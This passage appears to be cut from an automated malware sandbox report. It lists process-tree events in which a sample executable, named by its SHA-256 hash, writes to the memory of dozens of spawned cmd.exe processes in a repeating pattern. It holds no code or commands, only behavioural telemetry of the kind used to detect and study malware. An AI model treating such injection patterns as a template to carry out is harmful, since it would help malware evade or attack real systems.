710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 373 PID 3832 wrote to memory of 5764 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 373 PID 5764 wrote to memory of 5812 5764 cmd.exe 375 PID 5764 wrote to memory of 5812 5764 cmd.exe 375 PID 5764 wrote to memory of 5812 5764 cmd.exe 375 PID 5764 wrote to memory of 5832 5764 cmd.exe 376 PID 5764 wrote to memory of 5832 5764 cmd.exe 376 PID 5764 wrote to memory of 5832 5764 cmd.exe 376 PID 5764 wrote to memory of 5852 5764 cmd.exe 377 PID 5764 wrote to memory of 5852 5764 cmd.exe 377 PID 5764 wrote to memory of 5852 5764 cmd.exe 377 PID 5852 wrote to memory of 5868 5852 cmd.exe 378 PID 5852 wrote to memory of 5868 5852 cmd.exe 378 PID 5852 wrote to memory of 5868 5852 cmd.exe 378 PID 5764 wrote to memory of 5892 5764 cmd.exe 379 PID 5764 wrote to memory of 5892 5764 cmd.exe 379 PID 5764 wrote to memory of 5892 5764 cmd.exe 379 PID 3832 wrote to memory of 5916 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 380 PID 3832 wrote to memory of 5916 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 380 PID 3832 wrote to memory of 5916 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 380 PID 5916 wrote to memory of 5964 5916 cmd.exe 382 PID 5916 wrote to memory of 5964 5916 cmd.exe 382 PID 5916 wrote to memory of 5964 5916 cmd.exe 382 PID 5916 wrote to memory of 5984 5916 cmd.exe 383 PID 5916 wrote to memory of 5984 5916 cmd.exe 383 PID 5916 wrote to memory of 5984 5916 cmd.exe 383 PID 5916 wrote to memory of 6004 5916 cmd.exe 384 PID 5916 wrote to memory of 6004 5916 cmd.exe 384 PID 5916 wrote to memory of 6004 5916 cmd.exe 384 PID 6004 wrote to memory of 6020 6004 cmd.exe 385 PID 6004 wrote to memory of 6020 6004 cmd.exe 385 PID 6004 wrote to memory of 6020 6004 cmd.exe 385 PID 5916 wrote to memory of 6044 5916 cmd.exe 386 PID 5916 wrote to memory of 6044 5916 cmd.exe 386 PID 5916 wrote to memory of 6044 5916 cmd.exe 386 PID 3832 wrote to memory of 6068 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 387 PID 3832 wrote to memory of 6068 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 387 PID 3832 wrote to memory of 6068 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 387 PID 6068 wrote to memory of 6116 6068 cmd.exe 389 PID 6068 wrote to memory of 6116 6068 cmd.exe 389 PID 6068 wrote to memory of 6116 6068 cmd.exe 389 PID 6068 wrote to memory of 6140 6068 cmd.exe 390 PID 6068 wrote to memory of 6140 6068 cmd.exe 390 PID 6068 wrote to memory of 6140 6068 cmd.exe 390 PID 6068 wrote to memory of 5128 6068 cmd.exe 391 PID 6068 wrote to memory of 5128 6068 cmd.exe 391 PID 6068 wrote to memory of 5128 6068 cmd.exe 391 PID 5128 wrote to memory of 5144 5128 cmd.exe 392 PID 5128 wrote to memory of 5144 5128 cmd.exe 392 PID 5128 wrote to memory of 5144 5128 cmd.exe 392 PID 6068 wrote to memory of 5088 6068 cmd.exe 393 PID 6068 wrote to memory of 5088 6068 cmd.exe 393 PID 6068 wrote to memory of 5088 6068 cmd.exe 393 PID 3832 wrote to memory of 4944 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 394 PID 3832 wrote to memory of 4944 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 394 PID 3832 wrote to memory of 4944 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 394 PID 4944 wrote to memory of 5240 4944 cmd.exe 396 PID 4944 wrote to memory of 5240 4944 cmd.exe 396 PID 4944 wrote to memory of 5240 4944 cmd.exe 396 PID 4944 wrote to memory of 5252 4944 cmd.exe 397 PID 4944 wrote to memory of 5252 4944 cmd.exe 397 PID 4944 wrote to memory of 5252 4944 cmd.exe 397 PID 4944 wrote to memory of 5288 4944 cmd.exe 398 PID 4944 wrote to memory of 5288 4944 cmd.exe 398 PID 4944 wrote to memory of 5288 4944 cmd.exe 398 PID 5288 wrote to memory of 5188 5288 cmd.exe 399 PID 5288 wrote to memory of 5188 5288 cmd.exe 399 PID 5288 wrote to memory of 5188 5288 cmd.exe 399 PID 4944 wrote to memory of 5180 4944 cmd.exe 400 PID 4944 wrote to memory of 5180 4944 cmd.exe 400 PID 4944 wrote to memory of 5180 4944 cmd.exe 400 PID 3832 wrote to memory of 5368 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 401 PID 3832 wrote to memory of 5368 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 401 PID 3832 wrote to memory of 5368 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 401 PID 5368 wrote to memory of 5408 5368 cmd.exe 403 PID 5368 wrote to memory of 5408 5368 cmd.exe 403 PID 5368 wrote to memory of 5408 5368 cmd.exe 403 PID 5368 wrote to memory of 5452 5368 cmd.exe 404 PID 5368 wrote to memory of 5452 5368 cmd.exe 404 PID 5368 wrote to memory of 5452 5368 cmd.exe 404 PID 5368 wrote to memory of 5312 5368 cmd.exe 405 PID 5368 wrote to memory of 5312 5368 cmd.exe 405 PID 5368 wrote to memory of 5312 5368 cmd.exe 405 PID 5312 wrote to memory of 5328 5312 cmd.exe 406 PID 5312 wrote to memory of 5328 5312 cmd.exe 406 PID 5312 wrote to memory of 5328 5312 cmd.exe 406 PID 5368 wrote to memory of 5532 5368 cmd.exe 407 PID 5368 wrote to memory of 5532 5368 cmd.exe 407 PID 5368 wrote to memory of 5532 5368 cmd.exe 407 PID 3832 wrote to memory of 5564 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 408 PID 3832 wrote to memory of 5564 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 408 PID 3832 wrote to memory of 5564 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 408 PID 5564 wrote to memory of 5512 5564 cmd.exe 410 PID 5564 wrote to memory of 5512 5564 cmd.exe 410 PID 5564 wrote to memory of 5512 5564 cmd.exe 410 PID 5564 wrote to memory of 5492 5564 cmd.exe 411 PID 5564 wrote to memory of 5492 5564 cmd.exe 411 PID 5564 wrote to memory of 5492 5564 cmd.exe 411 PID 5564 wrote to memory of 5632 5564 cmd.exe 412 PID 5564 wrote to memory of 5632 5564 cmd.exe 412 PID 5564 wrote to memory of 5632 5564 cmd.exe 412 PID 5632 wrote to memory of 5668 5632 cmd.exe 413 PID 5632 wrote to memory of 5668 5632 cmd.exe 413 PID 5632 wrote to memory of 5668 5632 cmd.exe 413 PID 5564 wrote to memory of 5712 5564 cmd.exe 414 PID 5564 wrote to memory of 5712 5564 cmd.exe 414 PID 5564 wrote to memory of 5712 5564 cmd.exe 414 PID 3832 wrote to memory of 5716 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 415 PID 3832 wrote to memory of 5716 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 415 PID 3832 wrote to memory of 5716 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 415 PID 5716 wrote to memory of 5652 5716 cmd.exe 417 PID 5716 wrote to memory of 5652 5716 cmd.exe 417 PID 5716 wrote to memory of 5652 5716 cmd.exe 417 PID 5716 wrote to memory of 5820 5716 cmd.exe 418 PID 5716 wrote to memory of 5820 5716 cmd.exe 418 PID 5716 wrote to memory of 5820 5716 cmd.exe 418 PID 5716 wrote to memory of 5836 5716 cmd.exe 419 PID 5716 wrote to memory of 5836 5716 cmd.exe 419 PID 5716 wrote to memory of 5836 5716 cmd.exe 419 PID 5836 wrote to memory of 5876 5836 cmd.exe 420 PID 5836 wrote to memory of 5876 5836 cmd.exe 420 PID 5836 wrote to memory of 5876 5836 cmd.exe 420 PID 5716 wrote to memory of 5856 5716 cmd.exe 421 PID 5716 wrote to memory of 5856 5716 cmd.exe 421 PID 5716 wrote to memory of 5856 5716 cmd.exe 421 PID 3832 wrote to memory of 5808 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 422 PID 3832 wrote to memory of 5808 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 422 PID 3832 wrote to memory of 5808 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 422 PID 5808 wrote to memory of 5968 5808 cmd.exe 424 PID 5808 wrote to memory of 5968 5808 cmd.exe 424 PID 5808 wrote to memory of 5968 5808 cmd.exe 424 PID 5808 wrote to memory of 5988 5808 cmd.exe 425 PID 5808 wrote to memory of 5988 5808 cmd.exe 425 PID 5808 wrote to memory of 5988 5808 cmd.exe 425 PID 5808 wrote to memory of 6040 5808 cmd.exe 426 PID 5808 wrote to memory of 6040 5808 cmd.exe 426 PID 5808 wrote to memory of 6040 5808 cmd.exe 426 PID 6040 wrote to memory of 6008 6040 cmd.exe 427 PID 6040 wrote to memory of 6008 6040 cmd.exe 427 PID 6040 wrote to memory of 6008 6040 cmd.exe 427 PID 5808 wrote to memory of 5960 5808 cmd.exe 428 PID 5808 wrote to memory of 5960 5808 cmd.exe 428 PID 5808 wrote to memory of 5960 5808 cmd.exe 428 PID 3832 wrote to memory of 5940 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 429 PID 3832 wrote to memory of 5940 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 429 PID 3832 wrote to memory of 5940 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 429 PID 5940 wrote to memory of 5132 5940 cmd.exe 431 PID 5940 wrote to memory of 5132 5940 cmd.exe 431 PID 5940 wrote to memory of 5132 5940 cmd.exe 431 PID 5940 wrote to memory of 5156 5940 cmd.exe 432 PID 5940 wrote to memory of 5156 5940 cmd.exe 432 PID 5940 wrote to memory of 5156 5940 cmd.exe 432 PID 5940 wrote to memory of 5028 5940 cmd.exe 433 PID 5940 wrote to memory of 5028 5940 cmd.exe 433 PID 5940 wrote to memory of 5028 5940 cmd.exe 433 PID 5028 wrote to memory of 4100 5028 cmd.exe 434 PID 5028 wrote to memory of 4100 5028 cmd.exe 434 PID 5028 wrote to memory of 4100 5028 cmd.exe 434 PID 5940 wrote to memory of 6072 5940 cmd.exe 435 PID 5940 wrote to memory of 6072 5940 cmd.exe 435 PID 5940 wrote to memory of 6072 5940 cmd.exe 435 PID 3832 wrote to memory of 5176 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 436 PID 3832 wrote to memory of 5176 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 436 PID 3832 wrote to memory of 5176 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 436 PID 5176 wrote to memory of 5192 5176 cmd.exe 438 PID 5176 wrote to memory of 5192 5176 cmd.exe 438 PID 5176 wrote to memory of 5192 5176 cmd.exe 438 PID 5176 wrote to memory of 5316 5176 cmd.exe 439 PID 5176 wrote to memory of 5316 5176 cmd.exe 439 PID 5176 wrote to memory of 5316 5176 cmd.exe 439 PID 5176 wrote to memory of 5232 5176 cmd.exe 440 PID 5176 wrote to memory of 5232 5176 cmd.exe 440 PID 5176 wrote to memory of 5232 5176 cmd.exe 440 PID 5232 wrote to memory of 1720 5232 cmd.exe 441 PID 5232 wrote to memory of 1720 5232 cmd.exe 441 PID 5232 wrote to memory of 1720 5232 cmd.exe 441 PID 5176 wrote to memory of 5380 5176 cmd.exe 442 PID 5176 wrote to memory of 5380 5176 cmd.exe 442 PID 5176 wrote to memory of 5380 5176 cmd.exe 442 PID 3832 wrote to memory of 5336 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 443 PID 3832 wrote to memory of 5336 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 443 PID 3832 wrote to memory of 5336 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 443 PID 5336 wrote to memory of 5548 5336 cmd.exe 445 PID 5336 wrote to memory of 5548 5336 cmd.exe 445 PID 5336 wrote to memory of 5548 5336 cmd.exe 445 PID 5336 wrote to memory of 5428 5336 cmd.exe 446 PID 5336 wrote to memory of 5428 5336 cmd.exe 446 PID 5336 wrote to memory of 5428 5336 cmd.exe 446 PID 5336 wrote to memory of 5388 5336 cmd.exe 447 PID 5336 wrote to memory of 5388 5336 cmd.exe 447 PID 5336 wrote to memory of 5388 5336 cmd.exe 447 PID 5388 wrote to memory of 5472 5388 cmd.exe 448 PID 5388 wrote to memory of 5472 5388 cmd.exe 448 PID 5388 wrote to memory of 5472 5388 cmd.exe 448 PID 5336 wrote to memory of 5504 5336 cmd.exe 449 PID 5336 wrote to memory of 5504 5336 cmd.exe 449 PID 5336 wrote to memory of 5504 5336 cmd.exe 449 PID 3832 wrote to memory of 5696 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 450 PID 3832 wrote to memory of 5696 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 450 PID 3832 wrote to memory of 5696 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 450 PID 5696 wrote to memory of 5580 5696 cmd.exe 452 PID 5696 wrote to memory of 5580 5696 cmd.exe 452 PID 5696 wrote to memory of 5580 5696 cmd.exe 452 PID 5696 wrote to memory of 5756 5696 cmd.exe 453 PID 5696 wrote to memory of 5756 5696 cmd.exe 453 PID 5696 wrote to memory of 5756 5696 cmd.exe 453 PID 5696 wrote to memory of 5824 5696 cmd.exe 454 PID 5696 wrote to memory of 5824 5696 cmd.exe 454 PID 5696 wrote to memory of 5824 5696 cmd.exe 454 PID 5824 wrote to memory of 5844 5824 cmd.exe 455 PID 5824 wrote to memory of 5844 5824 cmd.exe 455 PID 5824 wrote to memory of 5844 5824 cmd.exe 455 PID 5696 wrote to memory of 5884 5696 cmd.exe 456 PID 5696 wrote to memory of 5884 5696 cmd.exe 456 PID 5696 wrote to memory of 5884 5696 cmd.exe 456 PID 3832 wrote to memory of 5900 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 457 PID 3832 wrote to memory of 5900 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 457 PID 3832 wrote to memory of 5900 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 457 PID 5900 wrote to memory of 5792 5900 cmd.exe 459 PID 5900 wrote to memory of 5792 5900 cmd.exe 459 PID 5900 wrote to memory of 5792 5900 cmd.exe 459 PID 5900 wrote to memory of 5992 5900 cmd.exe 460 PID 5900 wrote to memory of 5992 5900 cmd.exe 460 PID 5900 wrote to memory of 5992 5900 cmd.exe 460 PID 5900 wrote to memory of 6024 5900 cmd.exe 461 PID 5900 wrote to memory of 6024 5900 cmd.exe 461 PID 5900 wrote to memory of 6024 5900 cmd.exe 461 PID 6024 wrote to memory of 6060 6024 cmd.exe 462 PID 6024 wrote to memory of 6060 6024 cmd.exe 462 PID 6024 wrote to memory of 6060 6024 cmd.exe 462 PID 5900 wrote to memory of 5920 5900 cmd.exe 463 PID 5900 wrote to memory of 5920 5900 cmd.exe 463 PID 5900 wrote to memory of 5920 5900 cmd.exe 463 PID 3832 wrote to memory of 5932 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 464 PID 3832 wrote to memory of 5932 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 464 PID 3832 wrote to memory of 5932 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 464 PID 5932 wrote to memory of 5152 5932 cmd.exe 466 PID 5932 wrote to memory of 5152 5932 cmd.exe 466 PID 5932 wrote to memory of 5152 5932 cmd.exe 466 PID 5932 wrote to memory of 6096 5932 cmd.exe 467 PID 5932 wrote to memory of 6096 5932 cmd.exe 467 PID 5932 wrote to memory of 6096 5932 cmd.exe 467 PID 5932 wrote to memory of 4516 5932 cmd.exe 468 PID 5932 wrote to memory of 4516 5932 cmd.exe 468 PID 5932 wrote to memory of 4516 5932 cmd.exe 468 PID 4516 wrote to memory of 4420 4516 cmd.exe 469 PID 4516 wrote to memory of 4420 4516 cmd.exe 469 PID 4516 wrote to memory of 4420 4516 cmd.exe 469 PID 5932 wrote to memory of 6128 5932 cmd.exe 470 PID 5932 wrote to memory of 6128 5932 cmd.exe 470 PID 5932 wrote to memory of 6128 5932 cmd.exe 470 PID 3832 wrote to memory of 5280 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 471 PID 3832 wrote to memory of 5280 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 471 PID 3832 wrote to memory of 5280 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 471 PID 5280 wrote to memory of 5216 5280 cmd.exe 473 PID 5280 wrote to memory of 5216 5280 cmd.exe 473 PID 5280 wrote to memory of 5216 5280 cmd.exe 473 PID 5280 wrote to memory of 5220 5280 cmd.exe 474 PID 5280 wrote to memory of 5220 5280 cmd.exe 474 PID 5280 wrote to memory of 5220 5280 cmd.exe 474 PID 5280 wrote to memory of 5444 5280 cmd.exe 475 PID 5280 wrote to memory of 5444 5280 cmd.exe 475 PID 5280 wrote to memory of 5444 5280 cmd.exe 475 PID 5444 wrote to memory of 5260 5444 cmd.exe 476 PID 5444 wrote to memory of 5260 5444 cmd.exe 476 PID 5444 wrote to memory of 5260 5444 cmd.exe 476 PID 5280 wrote to memory of 5348 5280 cmd.exe 477 PID 5280 wrote to memory of 5348 5280 cmd.exe 477 PID 5280 wrote to memory of 5348 5280 cmd.exe 477 PID 3832 wrote to memory of 5540 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 478 PID 3832 wrote to memory of 5540 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 478 PID 3832 wrote to memory of 5540 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 478 PID 5540 wrote to memory of 5392 5540 cmd.exe 480 PID 5540 wrote to memory of 5392 5540 cmd.exe 480 PID 5540 wrote to memory of 5392 5540 cmd.exe 480 PID 5540 wrote to memory of 5692 5540 cmd.exe 481 PID 5540 wrote to memory of 5692 5540 cmd.exe 481 PID 5540 wrote to memory of 5692 5540 cmd.exe 481 PID 5540 wrote to memory of 5344 5540 cmd.exe 482 PID 5540 wrote to memory of 5344 5540 cmd.exe 482 PID 5540 wrote to memory of 5344 5540 cmd.exe 482 PID 5344 wrote to memory of 5332 5344 cmd.exe 483 PID 5344 wrote to memory of 5332 5344 cmd.exe 483 PID 5344 wrote to memory of 5332 5344 cmd.exe 483 PID 5540 wrote to memory of 5568 5540 cmd.exe 484 PID 5540 wrote to memory of 5568 5540 cmd.exe 484 PID 5540 wrote to memory of 5568 5540 cmd.exe 484 PID 3832 wrote to memory of 5828 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 485 PID 3832 wrote to memory of 5828 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 485 PID 3832 wrote to memory of 5828 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 485 PID 5828 wrote to memory of 5604 5828 cmd.exe 487 PID 5828 wrote to memory of 5604 5828 cmd.exe 487 PID 5828 wrote to memory of 5604 5828 cmd.exe 487 PID 5828 wrote to memory of 5608 5828 cmd.exe 488 PID 5828 wrote to memory of 5608 5828 cmd.exe 488 PID 5828 wrote to memory of 5608 5828 cmd.exe 488 PID 5828 wrote to memory of 5976 5828 cmd.exe 489 PID 5828 wrote to memory of 5976 5828 cmd.exe 489 PID 5828 wrote to memory of 5976 5828 cmd.exe 489 PID 5976 wrote to memory of 6032 5976 cmd.exe 490 PID 5976 wrote to memory of 6032 5976 cmd.exe 490 PID 5976 wrote to memory of 6032 5976 cmd.exe 490 PID 5828 wrote to memory of 6016 5828 cmd.exe 491 PID 5828 wrote to memory of 6016 5828 cmd.exe 491 PID 5828 wrote to memory of 6016 5828 cmd.exe 491 PID 3832 wrote to memory of 6056 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 492 PID 3832 wrote to memory of 6056 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 492 PID 3832 wrote to memory of 6056 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 492 PID 6056 wrote to memory of 5648 6056 cmd.exe 494 PID 6056 wrote to memory of 5648 6056 cmd.exe 494 PID 6056 wrote to memory of 5648 6056 cmd.exe 494 PID 6056 wrote to memory of 5140 6056 cmd.exe 495 PID 6056 wrote to memory of 5140 6056 cmd.exe 495 PID 6056 wrote to memory of 5140 6056 cmd.exe 495 PID 6056 wrote to memory of 4652 6056 cmd.exe 496 PID 6056 wrote to memory of 4652 6056 cmd.exe 496 PID 6056 wrote to memory of 4652 6056 cmd.exe 496 PID 4652 wrote to memory of 6092 4652 cmd.exe 497 PID 4652 wrote to memory of 6092 4652 cmd.exe 497 PID 4652 wrote to memory of 6092 4652 cmd.exe 497 PID 6056 wrote to memory of 4776 6056 cmd.exe 498 PID 6056 wrote to memory of 4776 6056 cmd.exe 498 PID 6056 wrote to memory of 4776 6056 cmd.exe 498 PID 3832 wrote to memory of 4888 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 499 PID 3832 wrote to memory of 4888 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 499 PID 3832 wrote to memory of 4888 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 499 PID 4888 wrote to memory of 5212 4888 cmd.exe 501 PID 4888 wrote to memory of 5212 4888 cmd.exe 501 PID 4888 wrote to memory of 5212 4888 cmd.exe 501 PID 4888 wrote to memory of 5456 4888 cmd.exe 502 PID 4888 wrote to memory of 5456 4888 cmd.exe 502 PID 4888 wrote to memory of 5456 4888 cmd.exe 502 PID 4888 wrote to memory of 5292 4888 cmd.exe 503 PID 4888 wrote to memory of 5292 4888 cmd.exe 503 PID 4888 wrote to memory of 5292 4888 cmd.exe 503 PID 5292 wrote to memory of 5420 5292 cmd.exe 504 PID 5292 wrote to memory of 5420 5292 cmd.exe 504 PID 5292 wrote to memory of 5420 5292 cmd.exe 504 PID 4888 wrote to memory of 5256 4888 cmd.exe 506 PID 4888 wrote to memory of 5256 4888 cmd.exe 506 PID 4888 wrote to memory of 5256 4888 cmd.exe 506 PID 3832 wrote to memory of 5404 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 3832 wrote to memory of 5404 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 3832 wrote to memory of 5404 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 5404 wrote to memory of 5584 5404 cmd.exe 509 PID 5404 wrote to memory of 5584 5404 cmd.exe 509 PID 5404 wrote to memory of 5584 5404 cmd.exe 509 PID 5404 wrote to memory of 5780 5404 cmd.exe 510 PID 5404 wrote to memory of 5780 5404 cmd.exe 510 PID 5404 wrote to memory of 5780 5404 cmd.exe 510 PID 5404 wrote to memory of 5508 5404 cmd.exe 511 PID 5404 wrote to memory of 5508 5404 cmd.exe 511 PID 5404 wrote to memory of 5508 5404 cmd.exe 511 PID 5508 wrote to memory of 5424 5508 cmd.exe 512 PID 5508 wrote to memory of 5424 5508 cmd.exe 512 PID 5508 wrote to memory of 5424 5508 cmd.exe 512 PID 5404 wrote to memory of 5864 5404 cmd.exe 513 PID 5404 wrote to memory of 5864 5404 cmd.exe 513 PID 5404 wrote to memory of 5864 5404 cmd.exe 513 PID 3832 wrote to memory of 5896 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 3832 wrote to memory of 5896 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 3832 wrote to memory of 5896 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 5896 wrote to memory of 6052 5896 cmd.exe 516 PID 5896 wrote to memory of 6052 5896 cmd.exe 516 PID 5896 wrote to memory of 6052 5896 cmd.exe 516 PID 5896 wrote to memory of 5860 5896 cmd.exe 517 PID 5896 wrote to memory of 5860 5896 cmd.exe 517 PID 5896 wrote to memory of 5860 5896 cmd.exe 517 PID 5896 wrote to memory of 5816 5896 cmd.exe 518 PID 5896 wrote to memory of 5816 5896 cmd.exe 518 PID 5896 wrote to memory of 5816 5896 cmd.exe 518 PID 5816 wrote to memory of 5640 5816 cmd.exe 519 PID 5816 wrote to memory of 5640 5816 cmd.exe 519 PID 5816 wrote to memory of 5640 5816 cmd.exe 519 PID 5896 wrote to memory of 1196 5896 cmd.exe 520 PID 5896 wrote to memory of 1196 5896 cmd.exe 520 PID 5896 wrote to memory of 1196 5896 cmd.exe 520 PID 3832 wrote to memory of 4508 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 3832 wrote to memory of 4508 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 3832 wrote to memory of 4508 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 4508 wrote to memory of 5944 4508 cmd.exe 523 PID 4508 wrote to memory of 5944 4508 cmd.exe 523 PID 4508 wrote to memory of 5944 4508 cmd.exe 523 PID 4508 wrote to memory of 5784 4508 cmd.exe 524 PID 4508 wrote to memory of 5784 4508 cmd.exe 524 PID 4508 wrote to memory of 5784 4508 cmd.exe 524 PID 4508 wrote to memory of 5224 4508 cmd.exe 525 PID 4508 wrote to memory of 5224 4508 cmd.exe 525 PID 4508 wrote to memory of 5224 4508 cmd.exe 525 PID 5224 wrote to memory of 5352 5224 cmd.exe 526 PID 5224 wrote to memory of 5352 5224 cmd.exe 526 PID 5224 wrote to memory of 5352 5224 cmd.exe 526 PID 4508 wrote to memory of 5164 4508 cmd.exe 527 PID 4508 wrote to memory of 5164 4508 cmd.exe 527 PID 4508 wrote to memory of 5164 4508 cmd.exe 527 PID 3832 wrote to memory of 5304 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 3832 wrote to memory of 5304 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 3832 wrote to memory of 5304 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 5304 wrote to memory of 5680 5304 cmd.exe 530 PID 5304 wrote to memory of 5680 5304 cmd.exe 530 PID 5304 wrote to memory of 5680 5304 cmd.exe 530 PID 5304 wrote to memory of 5560 5304 cmd.exe 531 PID 5304 wrote to memory of 5560 5304 cmd.exe 531 PID 5304 wrote to memory of 5560 5304 cmd.exe 531 PID 5304 wrote to memory of 5600 5304 cmd.exe 532 PID 5304 wrote to memory of 5600 5304 cmd.exe 532 PID 5304 wrote to memory of 5600 5304 cmd.exe 532 PID 5600 wrote to memory of 5612 5600 cmd.exe 533 PID 5600 wrote to memory of 5612 5600 cmd.exe 533 PID 5600 wrote to memory of 5612 5600 cmd.exe 533 PID 5304 wrote to memory of 5484 5304 cmd.exe 534 PID 5304 wrote to memory of 5484 5304 cmd.exe 534 PID 5304 wrote to memory of 5484 5304 cmd.exe 534 PID 3832 wrote to memory of 5728 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 536 PID 3832 wrote to memory of 5728 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 536 PID 3832 wrote to memory of 5728 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 536 PID 5728 wrote to memory of 5880 5728 cmd.exe 538 PID 5728 wrote to memory of 5880 5728 cmd.exe 538 PID 5728 wrote to memory of 5880 5728 cmd.exe 538 PID 5728 wrote to memory of 4364 5728 cmd.exe 539 PID 5728 wrote to memory of 4364 5728 cmd.exe 539 PID 5728 wrote to memory of 4364 5728 cmd.exe 539 PID 5728 wrote to memory of 6012 5728 cmd.exe 540 PID 5728 wrote to memory of 6012 5728 cmd.exe 540 PID 5728 wrote to memory of 6012 5728 cmd.exe 540 PID 6012 wrote to memory of 6104 6012 cmd.exe 541 PID 6012 wrote to memory of 6104 6012 cmd.exe 541 PID 6012 wrote to memory of 6104 6012 cmd.exe 541 PID 5728 wrote to memory of 5124 5728 cmd.exe 542 PID 5728 wrote to memory of 5124 5728 cmd.exe 542 PID 5728 wrote to memory of 5124 5728 cmd.exe 542 PID 3832 wrote to memory of 5552 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 543 PID 3832 wrote to memory of 5552 3832 